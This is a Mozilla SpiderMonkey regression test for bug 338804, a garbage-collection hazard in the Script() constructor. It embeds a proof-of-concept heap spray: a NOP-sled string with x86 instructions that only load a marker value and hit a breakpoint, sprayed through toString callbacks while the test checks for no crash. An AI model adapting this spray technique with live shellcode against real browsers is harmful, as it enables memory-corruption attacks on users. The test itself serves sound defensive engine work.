summaryrefslogtreecommitdiffstats
path: root/js/src/tests/js1_5/extensions/regress-338804-02.js
blob: e1e2a77ee4a50c77f19e5d1f5b677a93f29bd11b (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
/* -*- indent-tabs-mode: nil; js-indent-level: 2 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

//-----------------------------------------------------------------------------
var BUGNUMBER = 338804;
var summary = 'GC hazards in constructor functions';
var actual = 'No Crash';
var expect = 'No Crash';

printBugNumber(BUGNUMBER);
printStatus (summary);
printStatus ('Uses Intel Assembly');

// <script>
// SpiderMonkey Script() GC hazard exploit
//
// scale: magic number ;-)
//  BonEcho/2.0a2: 3000
//  Firefox/1.5.0.4: 2000
//
var rooter, scale = 2000;

exploit();
/*
  if(typeof(setTimeout) != "undefined") {
  setTimeout(exploit, 2000);
  } else {
  exploit();
  }
*/

function exploit() {
  if (typeof Script == 'undefined')
  {
    print('Test skipped. Script not defined.');
  }
  else
  {
    Script({ toString: fillHeap });
    Script({ toString: fillHeap });
  }
}

function createPayload() {
  var result = "\u9090", i;
  for(i = 0; i < 9; i++) {
    result += result;
  }
  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
  result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
  return result;
}

function fillHeap() {
  rooter = [];
  var payload = createPayload(), block = "", s2 = scale * 2, i;
  for(i = 0; i < scale; i++) {
    rooter[i] = block = block + payload;
  }
  for(; i < s2; i++) {
    rooter[i] = payload + i;
  }
  return "";
}

// </script>
 
reportCompare(expect, actual, summary);